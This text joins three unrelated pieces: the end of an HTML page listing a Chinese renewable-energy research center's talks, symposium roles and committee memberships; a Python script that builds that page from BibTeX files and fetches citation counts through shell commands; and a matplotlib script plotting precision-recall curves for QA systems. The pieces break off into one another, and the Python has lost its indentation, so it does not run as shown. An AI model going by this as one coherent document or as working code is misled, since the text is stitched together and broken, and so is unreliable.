Appropriate Energy Lab (RAEL), Energy & Resources Group, <strong> Host: Dr. D. Best</strong>,
Barrows Hall, Berkeley, CA, USA, January 31, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>National Taiwan University</strong>, Department of
Chemistry, <strong> Host: Prof. R. S. Liu</strong>, Taiwan, China, November 10, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Tamkang University</strong>, Department of Physics,
<strong>
Host: Prof. C. L. Dong</strong>, Taipei, China, November 9, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Warsaw</strong>, Centre of New
Technologies,
<strong> Host: Dr. A. Jelinska</strong>, Warsaw, Poland, May 30, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Szeged</strong>, Department of Inorganic &
Analytical Chemistry, <strong> Host: Prof. K. Schrantz</strong>, Szeged, Hungary, April 26, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Hungarian Academy of Sciences</strong>,<strong> Host:
Prof.
J. S. Pap</strong>, MTA Headquarters, Readings Hall, Budapest, Hungary, April 20, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>ETS-Ecole de Technologie Superieure</strong>, <strong>
Host:
Prof. S. Cloutier</strong>, Montreal, QC, Canada, April 6, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong> INRS-Institut National de la Recherche
Scientifique</strong>, <strong> Host: Prof. F. Vetrone</strong>, Varennes, QC, Canada, April 5,
2017
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Electronic Science & Technology of
China</strong>, Institute of Fundamental and Frontier Sciences, <strong>Host: Prof. Z. M.
Wang</strong>, Chengdu, P.R. China, December 16, 2016
</li>
<li>
<strong>Y. Liu</strong>
, <strong>Lawrence Berkeley National Lab</strong>, Joint Center for Artificial
Photosynthesis-JCAP
T3 Meeting (video conference), <strong>Host: Dr. F. M. Toma</strong>, Berkeley, CA, USA,
December 7,
2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Houston</strong>, Physics Colloquium,
<strong>Host:
Prof. O. K. Varghese</strong>, Houston, TX, USA, November 17, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <STRONG>SABIC Technology Center</STRONG>, Nanotechnology,
Corporate
Research & Development, <strong>Host: Dr. I. N. Odeh</strong>, Sugar Land, TX, USA, November
15,
2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Rice University</strong>, IEEE Photonics Society Houston
Chapter Seminar, <strong>Host: Prof. I. Thomann</strong>, Houston, TX, USA, November 14, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Lawrence Berkeley National Laboratory</strong>, Joint
Center
for Artificial Photosynthesis-JCAP Seminar Series, Chu Hall, <strong>Host: Dr. I. Sharp</strong>,
Berkeley, CA, USA, July 20, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of Toronto</strong>, IEEE Toronto section,
<strong>Host: Prof. N. P. Kherani</strong>, Toronto, ON, Canada, June 24, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>University of South Florida</strong>, Department of
Physics,
<strong>Host: Prof. M. H. Phan</strong>, Tampa, FL, USA, April 21, 2016
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Princeton University</strong>, Princeton Institute for
the
Science and Technology of Materials and Princeton Center for Complex Materials PRISM/PCCM
seminar
series, <strong>Host: Prof. B. Koel</strong>, Bowen Hall Auditorium, Princeton, NJ, USA, April
15,
2016
</li>
<li>
<strong>S.H. Shen</strong>,<strong> University of Wisconsin Madison</strong>, Department of
Chemistry, <strong>Host: Prof. Song Jin</strong>, Madison, WI, USA, February 23, 2016
</li>
<li>
<strong>Y. Liu</strong>,<strong> Lawrence Berkeley National Laboratory</strong>, Materials
Science
Division, Joint Center for Artificial Photosynthesis, <strong>Host: Dr. J. Ager</strong>,
Berkeley,
CA, October 12, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Warsaw University</strong>, Centre of New Technologies,
<strong>Host: Prof. J. Augustynski</strong>, Warsaw, Poland, Sep. 21, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>EMPA-Swiss Federal Laboratories for Materials Science
&
Technology</strong>, <strong>Host: Dr. A. Braun</strong>, Dubendorf, Switzerland, August 20,
2015
</li>
<li>
<strong>L. Vayssieres</strong>, <STRONG><SPAN
lang="EN-US">Concordia University</SPAN></STRONG><SPAN
lang="EN-US">,</SPAN> Department of Physics, <SPAN lang="EN-US"></SPAN><STRONG><SPAN
lang="EN-US"></SPAN>Host: Prof. P. Bianucci</STRONG>, Montreal, Canada, June 18, 2015
</li>
<li>
<STRONG>L. Vayssieres</STRONG>, <STRONG>Ecole Polytechnique de Montreal</STRONG><SPAN
lang="EN-US">,</SPAN> Departement de Genie Physique, <STRONG>Host: Prof. C. Santato</STRONG>,
Montreal, Canada, June 12, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong><span
lang="EN-US">The University of British Columbia</span></strong><span
lang="EN-US">,</span> Clean Energy Research Centre<span lang="EN-US">,</span><strong><span
lang="EN-US"> </span>Host: Prof. W. Merida</strong>, Vancouver, Canada, May 19, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong><span
lang="EN-US">Xi'an Jiaotong University</span></strong><span
lang="EN-US">,</span> Bioinspired Engineering and Biomechanics Center<span
lang="EN-US">,</span><strong><span
lang="EN-US"> </span>Host: Prof. T. J. Lu</strong>, Xi'an, China, April 30, 2015
</li>
<li>
<strong>L.J. Guo</strong>, <strong>Yangze University</strong>, Geophysics and Oil Resource
Institute, <strong>Host: Prof. Z.S. Zhang</strong>, Jingzhou, Hubei, China, December 23, 2014
</li>
<li>
<strong>L.J. Guo</strong>,<strong> Nanjing Technology University</strong>, College of Materials
Science and Engineering, <strong>Host: Prof. H. Zhang</strong>, Nanjing, JiangSu, China,
December 2,
2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> Massachusetts Institute of Technology</strong>,
Department
of Materials Science and Engineering, <strong>Host: Prof. H.L. Tuller</strong>, Cambridge, MA,
November 25, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> University of California Merced</strong>, School of
Engineering,<strong> Host: Prof. J. Lu</strong>, Merced, CA, August 29, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Lawrence Berkeley National Laboratory</strong>, Advanced
Light Source - Center for X-ray Optics Seminar Series, <strong>Host: Prof. T. Cuk</strong>,
Berkeley, CA, August 27, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> University of California Berkeley</strong>, Department
of
Chemistry,<strong> Host: Prof. T. Cuk</strong>, Berkeley, CA, August 26, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong><span
lang="EN-US">Peking University</span></strong><span
lang="EN-US">,</span> <span lang="EN-US">School of Physics, Institute of Condensed matter & Materials Physics, State Key Lab for Mesoscopic Physics,</span><strong><span
lang="EN-US"> </span>Host: Prof. Q. Zhao</strong>, Beijing, China, May 16, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <span lang="EN-US"><strong>Chinese Academy of Sciences</strong>, Technical Institute of Physics & Chemistry, </span><span
lang="EN-US">Key Laboratory of Photochemical Conversion & Optoelectronic Materials,</span><strong><span
lang="EN-US"> </span>Host: Prof. T. Zhang</strong>, Beijing, China, May 12, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> University of California Berkeley</strong>, Department
of
Mechanical Engineering, <strong>Host: Prof. S.S. Mao</strong>, Berkeley, CA, April 28, 2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> McGill University</strong>, Department of
Electrical
& Computer Engineering,<strong> Host: Prof. Z. Mi</strong>, Montreal, Canada, April 14,
2014
</li>
<li>
<strong>L. Vayssieres</strong>,<strong> Arizona State University</strong>, College of Technology
& Innovation, Department of Engineering & Computing Systems,<strong> Host: Prof. A. M.
Kannan</strong>, Polytechnic Campus, Mesa, AZ, USA, March 11, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>The University of Auckland</strong>,
School of Chemical Sciences, <strong>Host: Prof. J. Travas-Sejdic</strong>,
Auckland, New Zealand, December 6, 2013
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Uppsala</strong><strong> University</strong>, Inorganic
Chemistry Seminar, Angstrom Laboratory, <strong>Host: Prof. G. Westin</strong>, Uppsala, Sweden,
November 5, 2013
</li>
<li><strong>I. Zegkinoglou</strong>, <strong>Lawrence Berkeley National Laboratory</strong>,
Materials Sciences Division, Host: <strong>Dr. R. Schoenlein</strong>, Berkeley, CA,
October
31, 2013
</li>
<li><strong>L. Vayssieres</strong>,<strong> McGill University</strong>, Chemistry
Department,<strong> Host: Prof. D. Perepichka</strong>, Montreal, Canada, October 25, 2013
</li>
<li><strong>I. Zegkinoglou</strong>, <strong>Molecular Foundry</strong>, Theory of
Nanostructured
Materials Facility, U.S. Department of Energy Nanoscale Science Research Center, Lawrence
Berkeley
National Laboratory, <strong>Host: Dr. D. Prendergast</strong>, Berkeley, CA, July 31, 2013
</li>
<li><strong>L. Vayssieres</strong>,<strong> Lawrence Berkeley National Laboratory</strong>, Advanced
Light Source and Center for X-ray Optics,<strong> Host: Dr. J.-H. Guo</strong>, Berkeley,
CA,
June 26, 2013
</li>
<li><strong>L. Vayssieres</strong>, <strong>Stanford</strong><strong> University</strong>,
Center
on Nanostructuring for Efficient Energy Conversion, US DOE Energy Frontier Research
Center, <strong>Host: Prof. X.L. Zheng</strong>, Palo Alto, CA, June 24, 2013
</li>
<li><strong>L. Vayssieres</strong>,<strong> University of California Davis</strong>, Department of
Chemistry, <strong>Host: Prof. F. Osterloh</strong>, Davis, CA, May 16, 2013
</li>
<li><strong>L. Vayssieres</strong>, <strong>Vietnam Academy of Science and Technology</strong>,
Institute of Materials Science, <strong>Host: Prof. Nguyen Van Hieu</strong>, Hanoi, Vietnam,
November 5, 2012
</li>
<li><strong>L. Vayssieres</strong>, <strong>National University of Singapore</strong>, Department of
Materials Science & Engineering,<strong> Host: Prof. Q. Wang</strong>, Singapore, July 11,
2012
</li>
<li><strong>L. Vayssieres</strong>, <strong> Nanyang Technological University</strong>, School of
Physical & Mathematical Sciences, Department of Physics & Applied Physics, <strong>Host:
Prof. H. J. Fan</strong>, Singapore, July 9, 2012
</li>
<li><strong>E. Traversa</strong>, <strong>Chalmers Institute of Technology</strong>, Goteborg,
Sweden,
June 16-17, 2012
</li>
<li><strong>L. Vayssieres</strong>, <strong>PARC Xerox Company</strong>,<strong> Host: Dr. B.
Hsieh</strong>, Palo Alto, CA, May 15, 2012
</li>
<li>
<u>C.X. Kronawitter</u>, <strong>L. Vayssieres</strong>, B.R. Antoun, S.S. Mao, <strong>Yale
University</strong>, Center for Interface Structures & Phenomena, New Haven, CT, April 2,
2012
</li>
<li><strong>L. Vayssieres</strong>, <strong>Nikon & Essilor International Joint Research Center
Co.</strong>, <strong>Ltd.</strong>, <strong>Host: Dr. R. Bosmans</strong>, Kawasaki (Kanagawa),
Japan, March 22, 2012
</li>
<li>
<u>C.X. Kronawitter</u>, <strong>L. Vayssieres</strong>, B.R. Antoun, S.S. Mao, <strong>Brookhaven
National Laboratory</strong>, Photon Sciences Directorate, Upton, NY, February 19, 2012
</li>
</ol>
</div>
<div id="divorganizers">
<h3 align="center">
<strong><a id="organizers"></a>International Conference / Symposium / Workshop Chairman &
Organizer</strong> <span class="listcount">(19)</span></h3>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="19">
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Session Chairman, <strong>Symposium on Energy
Conversion</strong>, International Conference on Electroceramics (ICE), Ecole Polytechnique
Federale
de Lausanne (EPFL), Switzerland, July 14-19, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, lead-Organizer and Chairman, <strong>Symposium on Latest
Advances in
Solar Fuels</strong>, European MRS, Nice, France, May 21-31, 2019
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Chairman, <strong>6<sup>th</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 17, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer, <strong>XXVII International Materials Research
Congress (IMRC 2018)</strong>, Symposium C3 on Solar Hydrogen Production, Cancun, Mexico, August
19-24, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Chairman, <strong>5<sup>th</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 25, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and Chairman, <strong>4<sup>th</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 19, 2016
</li>
<li>
<STRONG>L. Vayssieres</STRONG>, Co-organizer and Co-chairman, <strong>9<sup>th</sup>
International
Conference on High Temperature Ceramic Matrix Composites & </strong><strong>Global Forum on
Advanced Materials and Technologies for Sustainable Development</strong>, Symposium G2 on
Functional
Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 26-30, 2016
</li>
<li>
<STRONG>L. Vayssieres</STRONG>, Co-Organizer and Chairman, <STRONG>3<sup>rd</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</STRONG>, Xi'an, P. R. China,
September 28, 2015<BR>
</li>
<li>
<strong>S.H. Shen</strong>, Lead organizer and Chairman, <strong>Symposium on Solar Hydrogen and
Nanotechnology X</strong>, SPIE Optics & Photonics, San Diego, CA, USA, August 9-13, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer and
Co-chairman, <strong>Symposium J: </strong><strong>Latest
Advances in Solar Water Splitting</strong>, 2015 Spring Meeting of the Materials Research
Society
(MRS), San Francisco, USA, April 6-10, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, Organizer and Co-chairman, <strong>2<sup>nd</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability</strong>, Xi'an, P. R. China,
September 19, 2014
</li>
<li><strong>L. Vayssieres</strong>, Co-organizer and Co-chair, <strong>Symposium on Solar
Fuels</strong>, American Ceramic Society Materials Challenges in Alternative& Renewable
Energy
(MCARE 2014), Hilton Clearwater Hotel, Clearwater, FL, USA, February 16-20, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, Chairman and Co-organizer, <strong>1<sup>st</sup>
International Workshop on Nanotechnology</strong>,<strong> Renewable Energy &
Sustainability</strong>, Xi'an, P. R. China, September 25, 2013
</li>
<li>
<strong>L. Vayssieres</strong>, Co-organizer, <strong>Symposium S19 on Advances in
Photocatalytic
Materials for Energy and Environmental Applications</strong>, 10<sup>th </sup>PACRIM meeting,
San
Diego, CA, USA, June 2-7, 2013
</li>
<li><strong>L. Vayssieres</strong>, Lead organizer and Chairman, <strong>Symposium Z on</strong>
<strong>Nanotechnology & Sustainability</strong>, 2013 Spring Meeting of the Materials
Research
Society (MRS), San Francisco, USA, April 1-5, 2013
</li>
<li>
<strong>E. Traversa</strong>, Co-organizer,<strong> Symposium on</strong> <strong>Materials as
Tools
for Sustainability</strong>, 2012 Fall Meeting of the Materials Research Society, Boston,
November
26-30, 2012
</li>
<li>
<strong>E. Traversa</strong>, Co-organizer, <strong>Symposium on</strong> <strong>Solid State
Ionic
Devices 9-Ion Conducting Thin Films and Multilayers</strong>, Pacific Rim Meeting on
Electrochemical
and Solid-State Science PriME 2012, Joint International Meeting: 222<sup>nd </sup>Meeting of the
Electrochemical Society and 2012 Fall Meeting of the Electrochemical Society of Japan, Honolulu,
October 7-12, 2012
</li>
<li>
<strong>L.J. Guo</strong>, Chairman, <strong>Sino-German Workshop on Energy
Research</strong>,<strong> </strong>Xi'an, P. R. China, September 5-8, 2012
</li>
<li><strong>L. Vayssieres</strong>, Lead organizer and Chairman, <strong>Symposium on Solar Hydrogen
and
Nanotechnology VII</strong>, SPIE Optics & Photonics meeting, San Diego, CA, USA, August
12-16,
2012
</li>
</ol>
</div>
<div id="divcommittee">
<h3>
<strong><a id="committee">International Advisory, Program, Executive or Steering Committee Member
</a></strong><span class="listcount">(29)</span>
</h3>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="29">
<li>
<strong>L. Vayssieres</strong>, <strong>The American Ceramic Society Global Ambassador
Program </strong> (2016-)
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>International Conference on Energy, Materials &
Photonics</strong>, Montreal, QC, Canada, July 8-11, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>UNESCO Africa Chair in Nanoscience
&Nanotechnology </strong>(2013-)
</li>
<li>
<strong>L. Vayssieres, Indian Association of Nanoscience & Nanotechnology (IANN)</strong>
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices 2018</strong>, San Diego, CA, USA, August 19-23, 2018
</li>
<li>
<strong>L. Vayssieres</strong>, <Strong>3<sup>rd</sup> International Symposium on Energy and
Environmental Photocatalytic Materials(EEPM3)</Strong>, Kraków, Poland, May 2018
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices 2017</strong>, San Diego, CA, USA, August 6-10, 2017
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices 2016</strong>, San Diego, CA, USA, August 28-September 1, 2016
</li>
<li>
<strong>S.H. Shen</strong>,
<strong>Energy Materials Nanotechnology (EMN) Meeting on Ultrafast Research</strong>, Las Vegas,
NV,
USA, November 16-19, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>5</strong><strong><sup>th</sup></strong><strong>
International Workshop on Nanotechnology & Application</strong>, Vung Tau, Vietnam, November
11-14, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Low Dimensional Materials &
Devices</strong>, San Diego, CA, USA, August 9-13, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Solar Hydrogen and
Nanotechnology X</strong>, San Diego, CA, USA, August 9-13, 2015
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>International Conference on Engineering and Scientific
Innovations</strong>, Mar Ephraem College of Engineering & Technology, Elavuvilai,
Tamilnadu,
India, March 20-21, 2015<BR>
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>Regional African Materials Research Society (AMRS)
Workshop</strong>, iThemba LABS, Somerset West, South Africa, December 3-4, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>African Laser Centre Annual Workshop</strong>, Rabat,
Morocco, November 3-5, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Solar Hydrogen and
Nanotechnology IX</strong>, San Diego, CA, USA, August 17-21, 2014
</li>
<li>
<strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Nanoepitaxy: Materials
& Devices VI</strong>, San Diego, CA, USA, August 17-21, 2014
</li>
<li><strong>L.J. Guo</strong>,<strong> 13<sup>th</sup> International Conference on Clean Energy
(ICCE2014)</strong>, Istanbul, Turkey, June 8-12, 2014
</li>
<li>
<strong>L.J. Guo</strong>,<strong> 6<sup>th</sup> International Conference on Applied
Energy (ICAE2014)</strong>, Taipei, Taiwan, May 30-June 2, 2014
</li>
<li><strong>L. Vayssieres</strong>, <strong>Nano & Giga Challenges in
Electronics</strong>,<strong>
Photonics and Renewable Energy: From Materials to Devices to System Architecture</strong>,
Symposium
and Spring School, Phoenix, Arizona, March 10-14, 2014
</li>
<li><strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Solar Hydrogen and
Nanotechnology VIII</strong>, San Diego, CA, USA, August 25-29, 2013
</li>
<li><strong>L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Nanoepitaxy: Materials
&
Devices V</strong>, San Diego, CA, USA, August 25-29, 2013
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>International Conference on</strong> <strong>Nanoscience
and
Nanotechnology: Lessons from Nature and Emerging Technologies</strong>, Ansal University,
Gurgaon,
India, July 25-26, 2013
</li>
<li>
<strong>L.J. Guo</strong>, <strong>1<sup>st</sup> Australia-China Joint Symposium on
Minerals</strong>,<strong> Metallurgy & Materials</strong>, Beijing, China, June 9-12,
2013
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>12<sup>th </sup>International Conference of Clean Energy
(ICCE 2012)</strong>, Xi'an, China, October 26-30, 2012
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>1<sup>st</sup> International Conference on Emerging
Advanced
Nanomaterials</strong>, Brisbane, Australia, October 22-25, 2012
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>4<sup>th </sup>International Symposium on Transparent
Conductive Materials</strong>, Hersonissos, Crete, Greece, October 21-26,
2012
</li>
<li>
<strong> L. Vayssieres</strong>, SPIE Optics & Photonics, <strong>Nanoepitaxy: Materials
&
Devices IV</strong>, San Diego, CA, USA, August 12-16, 2012
</li>
<li>
<strong>L. Vayssieres</strong>, <strong>20<sup>th</sup> International Conference on Composites
nano
or metals Engineering</strong>, Beijing, China, July 22-28, 2012
</li>
</ol>
</div>
</div>
<div id="backtothetop">
<a href="#top"><img src="images/assets/5.jpg" width="105" height="28" class="button"></a>
</div>
</div>
</div>
<div id="footer">
<div id="footeraddress">
<h3>International Research Center for Renewable Energy(IRCRE)</h3>
<ul>
<li>Tel: +86-29-82664664 Email: wangge2017@xjtu.edu.cn</li>
<li>No.28,Xianning West road,Xi'an,Shaanxi,710049 CHINA</li>
</ul>
</div>
<div id="copyright">
<p>Copyright 2019. All rights reserved</p>
</div>
</div>
<script src="./js/script.js"></script>
<script src="./js/statistics.js"></script>
</body>
</html>
'''
# 要解析的bib文件的路径
top15ArticleHtml = generateTop15ArtitleHtml(top15_bib_path)
articleHtml = generateAricleHtml(sorted_articles_bib_path)
bookHtml = generateBookHtml(others_bib_path)
proceedHtml = generateProceedHtml(others_bib_path)
editorialsHtml = generateEditorialsHtml(others_bib_path)
with open(researchnew_html_path, 'w', encoding='utf8') as htmlfile:
htmlfile.write(prebody + top15ArticleHtml +
articleHtml+bookHtml+proceedHtml+editorialsHtml + afterbody)
def main():
# openproxy()
# 从网站目录复制bib文件
# bibtexfilecopy()
# 分类,分成article.bib, bookchapter.bib, ...
bibtexclassify()
# entryadd()
# getclusterid()
# 更新引用次数
# getcitation()
# 按影响因子和引用次数对article排序,并取出top 15 most cited articles,
articlessort()
getop15articles()
# 合并文件
ircrebibmerge()
# updatestatistics()
generatehtml()
# filecopyback()
return 0
def getcitation():
articlesparser = BibTexParser(common_strings=False)
articlesparser.ignore_nonstandard_types = False
with open('../bib7image/articles.bib', encoding='utf8') as articlesfile:
articles_database = bibtexparser.load(articlesfile, articlesparser)
articleentries = articles_database.entries
import random
samplelist = random.sample(range(len(articleentries)), 20)
print(samplelist)
for i in samplelist:
print("---------------------------")
print("Entry number: " + str(i))
title = articleentries[i]['title']
clusterid = articleentries[i]['clusterid']
print("Title: " + title)
print("Cluster ID: " + clusterid)
if not clusterid == "unknown":
print(str(i))
try:
citations = os.popen(
'''/usr/bin/python3 /home/limingtao/ircre-bibtex/ircreupdate/scholarpy/scholar.py -c 1 -C ''' + clusterid + ''' |grep -v list |grep Citations''').read().strip().split()[
-1]
except:
citations = "unknown"
else:
citations = "unknown"
print("new Citations: " + citations)
if 'cited' in articleentries[i]:
oldcitednumber = int(articleentries[i]['cited'])
else:
oldcitednumber = 0
print("Old Cited Number: " + str(oldcitednumber))
if not citations == "unknown":
citednumber = int(citations)
if citednumber > oldcitednumber and ((citednumber - oldcitednumber) < 8):
articleentries[i]['cited'] = str(citednumber)
writer = BibTexWriter()
writer.indent = ' '
writer.order_entries_by = ('order',)
with open('/home/limingtao/ircre-bibtex/ircreupdate/cited-add-articles.bib', 'w', encoding='utf8') as newarticlefile:
bibtexparser.dump(articles_database, newarticlefile, writer=writer)
os.popen(
"cp /home/limingtao/ircre-bibtex/ircreupdate/cited-add-articles.bib tempcited-add-articles.bib")
os.popen("cp /home/limingtao/ircre-bibtex/ircreupdate/articles.bib /home/limingtao/ircre-bibtex/ircreupdate/oldarticles.bib")
with open('/home/limingtao/ircre-bibtex/ircreupdate/articles.bib', 'w', encoding='utf8') as newarticlefile:
bibtexparser.dump(articles_database, newarticlefile, writer=writer)
return 0
def entryadd(doi):
pass
def openproxy():
try:
sshid = os.popen(
'''ps aux | grep 9524| grep ssh''').read().strip().split()[1]
except:
sshid = None
if sshid is not None:
os.system('''kill ''' + sshid)
os.system('''/home/limingtao/bin/proxy.sh''')
return 0
def bibtexfilecopy():
dt = datetime.now()
ircrebibwebsitefile = '/srv/main-websites/ircre/js/ircre.bib'
ircrestatwebsitefile = '/srv/main-websites/ircre/js/statistics.js'
currentdir = '/home/limingtao/ircre-bibtex/ircreupdate'
os.system(
'''cd ''' + currentdir + ''';''' +
'''cp ''' + ircrebibwebsitefile + ''' ''' +
currentdir + '''/ -f ; cp ircre.bib ircre'''
+ str(dt.year) + str(dt.month) + str(dt.day) + '''.bib;''')
os.system(
'''cd ''' + currentdir + ''';''' +
'''cp ''' + ircrestatwebsitefile + ''' ''' +
currentdir + '''/ -f ; cp statistics.js statistics'''
+ str(dt.year) + str(dt.month) + str(dt.day) + '''.js;''')
return 0
def getclusterid(title, author):
parser = BibTexParser(common_strings=False)
parser.ignore_nonstandard_types = False
with open('../bib7image/articles.bib', encoding='utf8') as article_file:
article_database = bibtexparser.load(article_file, parser)
article_entries = article_database.entries.copy()
entries = bib_database.entries
print("---------------------------")
print("---------------------------")
print("---------------------------")
print("Total articles number: " + str(len(entries)))
print("---------------------------")
print("---------------------------")
print("---------------------------")
writer = BibTexWriter()
writer.indent = ' '
writer.order_entries_by = ('order',)
for i in range(len(entries)):
if entries[i]['clusterid'] == 'unknown':
print("---------------------------")
print("Entry number: " + str(i))
title = entries[i]['title']
print("Title: " + title)
clusterid = ''
try:
clusterid = os.popen(
'''/home/limingtao/ircre-bibtex/ircreupdate/scholarpy/scholar.py -c 1 -t --phrase="''' + title + '''" |grep ID| grep Cluster''').read().strip().split()[
-1]
except:
clusterid = "unknown"
print("new Cluster ID: " + clusterid)
entries[i]['clusterid'] = clusterid
with open('/home/limingtao/ircre-bibtex/ircreupdate/clusterid-added-ircre.bib', 'w', encoding='utf8') as newbibfile:
bibtexparser.dump(bib_database, newbibfile, writer=writer)
os.popen("cp /home/limingtao/ircre-bibtex/ircreupdate/clusterid-added-ircre.bib /home/limingtao/ircre-bibtex/ircreupdate/tempclusterid-added-ircre.bib")
with open('/home/limingtao/ircre-bibtex/ircreupdate/clusterid-added-ircre.bib', 'w', encoding='utf8') as newbibfile:
bibtexparser.dump(bib_database, newbibfile, writer=writer)
return 0
if __name__ == '__main__':
sys.exit(main())
|
import sys
from collections import defaultdict
import matplotlib
from numpy import arange
import matplotlib.pyplot as plt
output_file = 'external.pdf'
title = 'Comparision to external systems'
maxval = 70
width_in = 7
height_in = 2
data_dir = 'eval/qa/output/final'
datasets = ['webquestions', 'trec', 'wikianswers']
systems = ['system-full-uniontrain', 'sempre', 'paralex']
system_names = {
'system-full-uniontrain': r'\textsc{System}',
'sempre': r'\textsc{Sempre}',
'paralex': r'\textsc{Paralex}',
}
dataset_names = {
'webquestions': 'WebQuestions',
'trec': 'TREC',
'wikianswers': 'WikiAnswers'
}
label_position = {
'system-full-uniontrain': {
'webquestions': (.28, .39),
'trec': (.25, .49),
'wikianswers': (0.059, .20),
},
'paralex': {
'webquestions': (0.16, .25),
'trec': (0.09, .25),
'wikianswers': (.027, .13),
},
'sempre': {
'webquestions': (0.35, .57),
'trec': (0.07, .15),
'wikianswers': (0.013, .05),
}
}
system_colors = {
'system-full-uniontrain': 'blue',
'sempre': 'red',
'paralex': 'green',
}
system_linestyles = {
'system-full-uniontrain': '-',
'sempre': '-',
'paralex': '-'
}
system_markers = {
'system-full-uniontrain': ' ',
'sempre': ' ',
'paralex': ' '
}
dataset_recalls = {
'webquestions': [0, 25, 50],
'trec': [0, 15, 30],
'wikianswers': [0, 4, 8]
}
font = {'family' : 'serif',
'serif' : 'Computer Modern Roman',
'size' : 9}
matplotlib.rc('font', **font)
matplotlib.rc('text', usetex=True)
def read_data(dataset, system):
path = '%s/%s/%s/pr-top.txt' % (data_dir, dataset, system)
rs, ps = [], []
for line in open(path):
r, p = [float(x) for x in line.strip().split()]
rs.append(r)
ps.append(p)
rs, ps = rs[10:], ps[10:]
n_points = 10
max_recall = max(rs)
min_recall = min(rs)
incr = (max_recall - min_recall) / n_points
new_r, new_p = [], []
for i in xrange(n_points + 1):
recall = min_recall + i*incr
precision = max(p for (r,p) in zip(rs, ps) if r >= recall)
new_r.append(recall)
new_p.append(precision)
return new_r, new_p
data = defaultdict(dict)
for system in systems:
for dataset in datasets:
r, p = read_data(dataset, system)
data[dataset][system] = (r, p)
fig = plt.figure(figsize=(width_in, height_in))
lines = []
for (i, dataset) in enumerate(datasets):
ax = fig.add_subplot(1, 3, i+1)
ax.set_title(dataset_names[dataset], fontsize=9, y=1.0)
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
ax.spines['top'].set_color('none')
ax.spines['left'].set_linewidth(0.5)
ax.spines['right'].set_color('none')
ax.spines['bottom'].set_linewidth(0.5)
if i == 0:
ax.set_ylabel('Precision')
ax.set_xlabel('Recall')
ax.yaxis.set_ticks([0, 0.50, 1.0])
ax.yaxis.set_ticklabels(['0\\%%', '50\\%%', '100\\%%'])
all_rs = []
for system in systems:
r, p = data[dataset][system]
all_rs.extend(r)
line = ax.plot(r, p, lw=1, color=system_colors[system], linestyle=system_linestyles[system], marker=system_markers[system], markersize=3.5, markeredgecolor='none', markevery=3)
lines.extend(line)
